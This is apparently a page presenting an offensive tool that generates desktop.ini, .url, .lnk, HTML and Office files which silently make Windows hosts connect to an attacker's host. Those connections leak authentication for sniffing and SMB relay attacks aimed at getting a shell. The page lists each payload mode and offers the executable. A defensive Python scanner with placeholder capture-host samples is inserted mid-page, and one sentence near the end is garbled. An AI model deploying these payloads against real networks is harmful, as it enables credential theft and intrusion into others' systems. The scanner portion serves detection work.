Hacking is not always about breaking systems with remote execution vulnerabilities.
This time we are going to use a different approach.
Imagine that you are connected to a domain network and somehow you are able to
deliver files to the network, for example by writing files to a heavily used fileserver,
sending documents by email to network users or executing MITM attacks against HTTP
traffic. If you are able to do that, then you only need a way to force network computers
to connect to the host of your choice.
Our Network payload generation tool provides new ways to attack those networks, as it is
able to deploy several kinds of content that will force the remote computers to connect
to the designated target and authenticate themselves on behalf of the logged-on user.
At that point there are lots of ways to exploit those systems, like sniffing, named pipe
attacks or the new smbrelay3.
Our payload generation tool is able to generate and deploy several files like desktop.ini,
lnk files, url files and html/office documents with embedded links to a remote resource.
Those embedded links are automatically handled by Microsoft Explorer and there is
no way to disable it.
The -t parameter specifies what kind of payload is going to be used. Examples:
* d1: IconFile - desktop.ini:
  The IconFile parameter points to a network resource. When you access a filesystem
  folder and that desktop.ini is stored in a subfolder, explorer.exe will automatically
  connect to the network and send user
* d2: LocalizedResourceName - desktop.ini:
  Points to a network resource. Works with folder/subfolder.
* d3: InfoTip - desktop.ini:
  Points to a network resource. Works when selecting the folder.
* d4: desktop.ini - desktop.ini:
  Points to a network resource. Works when entering the folder.
* d0: All - desktop.ini:
  Deploy all known desktop.ini payloads at once to ensure that the remote target is engaged.
  InfoTip=Proof of concept for desktop redirect - http://www.tarasco.org
* u: url file:
  Deploy a .url file, which works like an lnk file. The target points to a network service.
* l: lnk file:
  Deploy a .lnk file. This is an empty built-in lnk file that contains a CUSTOMICON
  parameter (flag & 128) pointing to a network service.
* h: html file:
  Deploy a .html file with a <LINK REL="stylesheet"> pointing to a network service.
* o: office file:
  Deploy a .pps file with <LINK REL="stylesheet"> html code pointing to a network service.
  You can rename the file extension to .doc, .ppt, .pps, .xls, ...
An optional parameter points to the directory where the payload is going to be saved.
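From the defender's side, the same fields listed above are what to look for on a file share. The following is an added example (not the tool's code, not from the original page) that walks a directory tree and reports desktop.ini/.url keys and stylesheet links that reach an SMB share (UNC path or file:// URL); the sample share, the `capture-host.example` host name and the `demo()` helper are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# desktop.ini / .url keys the payloads above fill with a pointer to a remote resource
REDIRECT_KEYS = {"iconfile", "localizedresourcename", "infotip", "url"}
# "remote" here means a UNC path (\\host\...) or file:// URL; http(s) links are normal in HTML
REMOTE_RE = re.compile(r"\\\\[^\\\s]+|file://", re.IGNORECASE)
LINK_TAG_RE = re.compile(r"<link\b[^>]*>", re.IGNORECASE)
HREF_RE = re.compile(r'href\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)

def scan_ini_text(text):
    """(key, value) pairs of INI lines whose value reaches a remote host."""
    pairs = (line.partition("=") for line in text.splitlines())
    return [(k.strip(), v.strip()) for k, sep, v in pairs
            if sep and k.strip().lower() in REDIRECT_KEYS and REMOTE_RE.search(v)]

def scan_html_text(text):
    """hrefs of <link ... rel=stylesheet> tags that reach a remote host."""
    hrefs = [HREF_RE.search(t) for t in LINK_TAG_RE.findall(text) if "stylesheet" in t.lower()]
    return [m.group(1) for m in hrefs if m and REMOTE_RE.search(m.group(1))]

def scan_tree(root):
    """Walk root; return (relative path, key, value) findings. .lnk is binary, not parsed here."""
    root, findings = Path(root), []
    for path in (p for p in root.rglob("*") if p.is_file()):
        name, text = path.name.lower(), path.read_text(errors="ignore")
        if name == "desktop.ini" or name.endswith(".url"):
            hits = scan_ini_text(text)
        elif name.endswith((".html", ".htm", ".doc", ".ppt", ".pps", ".xls")):  # renamed HTML
            hits = [("stylesheet", h) for h in scan_html_text(text)]
        else:
            continue
        findings.extend((path.relative_to(root).as_posix(), k, v) for k, v in hits)
    return findings

def demo():
    """Constructed sample share: one benign desktop.ini and three planted redirects."""
    root = Path(tempfile.mkdtemp())
    samples = {  # hostname is a constructed placeholder
        "pics/desktop.ini": "[.ShellClassInfo]\nIconFile=\\\\capture-host.example\\share\\icon.ico\n",
        "desktop.ini": "[.ShellClassInfo]\nIconFile=%SystemRoot%\\system32\\shell32.dll\n",
        "intranet.url": "[InternetShortcut]\nURL=file://capture-host.example/share/\n",
        "slides.pps": '<html><link rel="stylesheet" href="file://capture-host.example/a.css"></html>',
    }
    for rel, body in samples.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return sorted(scan_tree(root))
```

Running `demo()` returns three findings (the UNC IconFile, the file:// URL shortcut and the renamed-HTML stylesheet) and skips the desktop.ini whose icon lives in shell32.dll.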
You can use this tool to deploy payloads and attack a network pipe created by the
or replay SMB or HTTP traffic to a designated target to get a shell with smbrelay3.
You can browse the source code online
(Windows executable + source code).